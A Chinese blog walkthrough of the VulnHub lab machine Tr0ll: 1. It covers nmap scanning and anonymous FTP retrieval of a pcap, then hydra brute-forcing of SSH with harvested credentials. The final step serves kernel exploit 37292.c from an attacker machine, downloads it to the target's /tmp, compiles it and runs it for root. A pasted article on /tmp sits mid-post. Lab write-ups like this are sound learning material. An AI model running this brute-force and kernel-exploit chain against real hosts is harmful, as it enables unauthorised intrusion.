当前位置: 首页 > article >正文

Tr0ll: 1 Vulnhub靶机渗透笔记

Tr0ll: 1

本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓励也不参与任何形式的非法活动。

如有侵权请联系我第一时间删除
靶机地址

Tr0ll: 1 ~ VulnHub

信息收集

nmap

主机发现

nmap -sn 192.168.236.128/24

tcp扫描

┌──(observer㉿kali)-[~/Tr0ll]
└─$ nmap -sT 192.168.236.136 -p- --min-rate 10000 -oA tcpscan
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 19:59 CST
Nmap scan report for 192.168.236.136
Host is up (0.0027s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

udp扫描

┌──(observer㉿kali)-[~/Tr0ll]
└─$ sudo nmap -sU 192.168.236.136 --min-rate 10000 -oA udpscan
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 20:01 CST
Nmap scan report for 192.168.236.136
Host is up (0.00024s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
814/udp   closed unknown
6970/udp  closed unknown
17946/udp closed unknown
19933/udp closed unknown
48078/udp closed unknown
49202/udp closed unknown
MAC Address: 00:0C:29:8C:0A:29 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds

刚刚扫描tcp扫到21ftp,22ssh,80web,现在对这三个端口进行详细的扫描

detail_tcpscan

┌──(observer㉿kali)-[~/Tr0ll]
└─$ sudo nmap -sT -sV -sC -O 192.168.236.136 -p 21,22,80 --min-rate 10000 -oA tcpscan_detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 20:13 CST
Nmap scan report for 192.168.236.136
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.236.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
MAC Address: 00:0C:29:8C:0A:29 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds

漏洞脚本扫描

nmap -script=vuln -p22,21,80 -min-rate 10000 -oA scriptvuln 192.168.236.136

这里不知道什么原因,扫不到东西

攻击面分析&尝试&getshell

那就不管了,主要看一下detail里的东西 这里本来是要先分析一下的,分析ftp的时候直接匿名登陆拿到了一个流量包,看到了一个关键的目录,然后去web渗透拿到了一些凭据,爆破后就ssh,思路就还挺简单的,所以就省略这个分析了

ftp

运行的是 vsftpd (Very Secure FTP Daemon) 3.0.2 版本

运行匿名登录,这个很值得关注:

 ftp-anon: Anonymous FTP login allowed  

在匿名登录的情况下,存在一个名为 lol.pcap 的文件具有读写执行权限 (-rwxrwxrwx),这表示任何连接到FTP服务器的人都可以读取、修改或删除这个文件。这对于安全性来说是一个严重的风险,因为它可能允许未授权的用户上传恶意内容或者修改现有文件。

-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]

ftp连接以明文传输

控制连接是以明文形式进行的。这意味着客户端与服务器之间的命令交互(例如登录、目录更改等)不会被加密。
|      Control connection is plain text

数据连接也将以明文形式进行。这表示当传输文件或目录列表时,这些数据也不会被加密
|      Data connections will be plain text

当我ftp不给用户名进去后,给出一条这样的报错,This FTP server is anonymous only 猜测anonymous就是管理员的username,而我们匿名进去是没有权限执行命令的

在这里插入图片描述

这里还尝试了用root,还是提示只能用anonymous

在这里插入图片描述

那就用anonymous匿名登录吧,提示输入密码,直接回车给他一个空密码,成功连接到了ftp,尝试输入ls ,是ok的 ,过了一会这个ftp就掉了,回头看tcp扫描结果发现 Session timeout in seconds is 600 ,也就是说600秒就会timeout,不过不影响什么

在这里插入图片描述

把这个流量文件下载下来

get lol.pcap

在wireshark中发现了一个secret_stuff.txt

在这里插入图片描述

但我尝试ftp去下载,也尝试web端去路由他,都失败了,那他到底是个什么呢,仔细看wireshark的流量,这里是抓到了request请求下载secret_stuff.txt ,仔细看一下,搞清楚下载过程的流量来源,又一开始我们就知道ftp是以明文传输数据的,既然这里有抓包的流量,也就是说这个响应包里肯定就是明文

在这里插入图片描述

将响应包里的明文拿出来:

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n
\n
Sucks, you were so close... gotta TRY HARDER!\n

大概意思就是 好好好,你真是个小机灵鬼,你差不多找到了sup3rs3cr3tdirlol 😛

真遗憾,你差一点就成功了… 还得再加把劲!

这个sup3rs3cr3tdirlol是leet speak风格的文字,其实就是supersecretdirlol超级秘密目录,猜测大概率是一个目录

web

直接访问80端口,是一个欠揍的暴漫表情

在这里插入图片描述

之前tcp扫描提示有/secret,访问一下看看,发现更欠揍了

在这里插入图片描述

目录扫描一下dirsearch和dirb都扫一下,都没有什么发现

在这里插入图片描述

在这里插入图片描述

访问ftp得到的/sup3rs3cr3tdirlol有一个文件,我们wget把他下载到kali

从这里开始我的思路就断了,然后去看了别人的blog。。 QAQ

直接cat一堆乱码不太好看,用strings从二进制文件中提取可打印的字符序列,或许可以看到一些我们想要的线索

在这里插入图片描述

看到Find address 0x0856BF to proceed ,意思让我们去找这个地址来继续,这会是个目录吗?

还真是,给了两个目录,一个用户名,一个passwd

在这里插入图片描述

先下载到kali里,方便用hrdra九头蛇去爆破一下ssh和ftp(这两个都可以登录)

wget http://192.168.236.136/0x0856BF/good_luck/which_one_lol.txt
wget http://192.168.236.136/0x0856BF/this_folder_contains_the_password/Pass.txt
--2024-12-08 23:32:21--  http://192.168.236.136/0x0856BF/this_folder_contains_the_password/Pass.txt

vim处理一下which_one_lol.txt

┌──(observer㉿kali)-[~/Tr0ll]
└─$ vim which_one_lol.txt                                                                                      
┌──(observer㉿kali)-[~/Tr0ll]
└─$ cat which_one_lol.txt 
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
hydra基础用法:

使用语法:hydra 参数 IP地址 服务名
帮助命令:hydra -h
常用命令:hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]

ftp

sudo hydra -L /YourPath/which_one_lol.txt -p /YourPath/Pass.txt 192.168.236.136 ssh 

ssh

sudo hydra -L /YourPath/which_one_lol.txt -p /YourPath/Pass.txt 192.168.236.136 ssh 

上面两条指令尝试用Pass.txt里的内容去爆破,都失败了

目录名提示说this_folder_contains_the_password

在这里插入图片描述

直接用这个文件名去ssh 成功拿到ssh的凭据:overflow Pass.txt

sudo hydra -L /YourPath/which_one_lol.txt -p Pass.txt 192.168.236.136 ssh 

在这里插入图片描述

ssh获取初步shell

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu

22端口跑的是一个OpenSSH服务,是6.6.1p1版本,服务器提供了DSARSAECDSAED25519 这几种密钥公钥算法用于主机认证

已经拿到一组凭据了,ssh连接获得初步shell

ssh overflow@192.168.236.136

成功登录

用python提升一下交互性

查询是否有python

dpkg -l | grep python

是有的,而且挺全的

那就用执行这条语句得到一个交互性更好的shell

python -c 'import pty;pty.spawn("/bin/bash")'
Pass.txt
ssh overflow@192.168.236.136

提权

信息收集

想sudo -l查看当前用户权限,但报错了,不允许使用这条命令

那就用uname -a查看一下靶机的内核版本,Linux 3.13.0

overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

这里提供了几种方式来查看linux版本,以及内核版本

$ cat /proc/version    #查看GCC版本号,linux版本号,Ubuntu版本号 
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014

$ lsb_release -a
No LSB modules are available.        
Distributor ID: Ubuntu               #类别是Ubuntu
Description:    Ubuntu 14.04.1 LTS   #LTS是Long Term Support:长时间支持版本
Release:        14.04                #发行日期或者发行版本号
Codename:       trusty 				#ubuntu的代号名称

$ uname -a    #显示linux 的内核版本和系统是多少位的:X86_64代表系统是64位的
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

#  使用 /etc/lsb-release 或 /etc/os-release 命令

$ cat /etc/os-release
#与 Ubuntu 16.04 及更高版本兼容
#查看信息列表,其中包括您的 Ubuntu 版本号及其版本名称。
#此外,还有一些指向 Ubuntu 网站和资源的链接可以为您提供帮助
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

$ cat /etc/lsb-release   
#它是为旧系统设计的,因此如果您运行的是过时的 Ubuntu 版本,则可以使用它
#使用该命令将返回更简单的结果,其中显示版本 ID、描述和代号。它不包括链接和 Ubuntu 版本名称
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

$ cat /etc/issue    
#/etc/issue 文件是基于文本的文档。它包含系统标识数据
#因为该命令不会显示您的 Ubuntu 版本以外的任何内容
Ubuntu 14.04.1 LTS \n \l

$ hostnamectl
#使用 hostnamectl 命令。
#当您要更改系统的主机名时,通常使用此方法。
#但是,它还会返回 Ubuntu 版本和计算机 ID 等信息。
   Static hostname: troll
         Icon name: computer-vm
           Chassis: vm
           Boot ID: e43aaf51725843209b9e700f5eab15f9
  Operating System: Ubuntu 14.04.1 LTS
            Kernel: Linux 3.13.0-32-generic
      Architecture: i686

其中lsb表示(Linux Standard Base):LSB是一套核心标准,它保证了LINUX发行版同LINUX应用程序之间的良好结合,具体地说,它是:
1、一个二进制接口规范,是指应用程序在系统间迁移时不用重新编译,保证应用程序在所有经过认证的LINUX发行版上都具有兼容性。
2、一个测试规范,测试LINUX发行版和LINUX应用程序是否符合LSB标准。
3、搭建遵从LSB规范的应用程序的开发环境。
4、为在纯LSB环境下运行和测试应用程序而提供的运行环境样本。

uname --s 显示内核名字
uname --r 显示内核版本
uname --n 显示网络主机名
uname --p 显示cpu

Exploit查询payload

根据内核版本在Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers查找对应的payload,并用searchsploit下载到kali上

searchsploit Linux 3.13.0
searchsploit -m 37292.c

Exp利用

在攻击机上开一个php服务或python服务,都可以

sudo php -S 0:80

这里用到了一个不起眼但是很有用的/tmp目录,参考Linux中最低调、最易让人忽视的tmp目录,原来用处那么大!-腾讯云开发者社区-腾讯云

在Linux操作系统中,tmp目录是一个临时目录,用于存储临时文件。这个目录通常位于根目录下,命名为/tmp。本文将详细介绍Linux中的tmp目录,包括它的作用、权限、使用方法和安全性等方面。

作用

tmp目录用于存储临时文件,这些文件通常是由操作系统或应用程序创建的。这些文件可以是日志文件、临时缓存文件、程序临时文件、打印队列文件等。它们在使用后很快就会被删除,因此/tmp目录通常保持相对较小的大小。

权限

在Linux中,tmp目录的权限通常设置为777(rwxrwxrwx),这意味着任何用户都可以访问和修改该目录中的文件。这是为了方便临时文件的创建和删除。然而,由于/tmp目录通常包含敏感信息,因此一些系统管理员可能会更改其权限以提高安全性。

使用方法

/tmp目录在Linux中被广泛使用。下面是/tmp目录的几个主要用途:

  1. 缓存

/tmp目录通常用于存储临时缓存文件,这些文件可以加速某些操作。例如,浏览器会将下载的文件保存到/tmp目录中,以便更快地访问这些文件。

  1. 打印队列

打印服务通常会将打印任务存储在/tmp目录中。这些文件在打印完成后会自动删除。

  1. 应用程序临时文件

某些应用程序需要在运行期间创建临时文件。例如,视频编辑器需要创建临时文件以存储正在编辑的视频文件。

  1. 日志文件

某些程序会将日志文件保存在/tmp目录中。这些日志文件通常包含程序运行期间的信息,例如错误消息或调试信息。

  1. 其他

/tmp目录还可用于其他临时文件的存储,例如备份文件、邮件附件等。

安全性

尽管/tmp目录通常是一个临时目录,但它也可能包含一些敏感信息,例如密码文件或其他保密数据。因此,在使用/tmp目录时需要注意安全问题。下面是一些有关使用/tmp目录的安全建议:

  1. 避免在/tmp目录中存储敏感信息

尽管/tmp目录通常会自动清理,但为了确保安全,最好避免在其中存储敏感信息。如果必须存储敏感信息,则应考虑将文件加密或将其存储在其他地方。

  1. 定期清理/tmp目录

为了保证安全,建议定期清理/tmp目录。这可以防止/tmp目录被填满,从而导致系统崩溃或无法正常工作。

  1. 限制/tmp目录的权限

由于/tmp目录通常包含敏感信息,一些系统管理员可能会限制其访问权限,以提高安全性。这可以通过更改目录权限或使用安全模块(如SELinux)来实现。

  1. 避免使用/tmp目录作为共享目录

/tmp目录通常是一个临时目录,不应用于共享目录。如果必须在多个计算机之间共享文件,则应使用其他共享目录,例如NFS共享目录或Samba共享目录。

  1. 防止/tmp目录成为攻击者的入口

/tmp目录可能成为攻击者攻击系统的入口。攻击者可能通过/tmp目录中的漏洞来执行恶意代码,因此需要采取一些措施来保护/tmp目录的安全。这可以通过升级系统补丁、安装防病毒软件或使用安全模块等方式实现。

结论

在Linux中,tmp目录是一个重要的临时目录,用于存储临时文件。尽管/tmp目录通常自动清理,但在使用时需要注意安全问题。为了确保安全,建议避免在其中存储敏感信息,定期清理/tmp目录,并限制其访问权限。此外,还应采取一些措施来防止/tmp目录成为攻击者的入口。通过这些措施,可以确保/tmp目录在系统中的安全使用。

在靶机上使用wget从攻击机上下载payload(记得先cd到/tmp)

wget http://192.168.236.128:80/37292.c

将C语言文件编译为二进制文件

cc -o exp 37292.c
或者用gcc
gcc 37292.c -o exp

授权,并执行文件,获取root权限

chmod +x exp

./exp即可提权

定妆照:

在这里插入图片描述


http://www.kler.cn/a/430072.html

相关文章:

  • 预训练语言模型——BERT
  • rk3568 , buildroot , qt ,使用sqlite, 动态库, 静态库
  • 【python基础——异常BUG】
  • 新版2024AndroidStudio项目目录结构拆分
  • 常见的开源网络操作系统
  • 有关Redis的相关概述
  • 阿里内部正式开源“Spring Cloud Alibaba (全彩小册)”
  • Android问题记录 - Inconsistent JVM-target compatibility detected for tasks
  • 05-树莓派-交叉编译
  • PHP和GD如何给图片添加滤镜效果
  • 【QNX+Android虚拟化方案】134 - QNX侧配置开机自动抓取tcpdump 报文
  • 第一篇:k8s架构与组件详解
  • 自然语言处理:从入门到精通全指引
  • 【LLMs】用LM Studio本地部署离线大语言模型
  • 从零开始的使用SpringBoot和WebSocket打造实时共享文档应用
  • 学生信息管理系统(简化版)
  • 动画Lottie
  • 微服务篇面试题
  • 亚马逊云科技Swami博士:生成式AI即将达到临界点
  • ESP32-S3模组上跑通ES8388(24)
  • 【时间序列预测】基于PyTorch实现CNN_BiLSTM算法
  • 【NextJS】Arco Design与Next.js快速上手
  • PDF提取文本
  • 微知-如何根据git reflog恢复到操作之前的状态?(git reflog; git reset --hard xxx)
  • NAT traversal 原理 | TCP / UDP/ P2P
  • 大数据笔记之flink集群的安装部署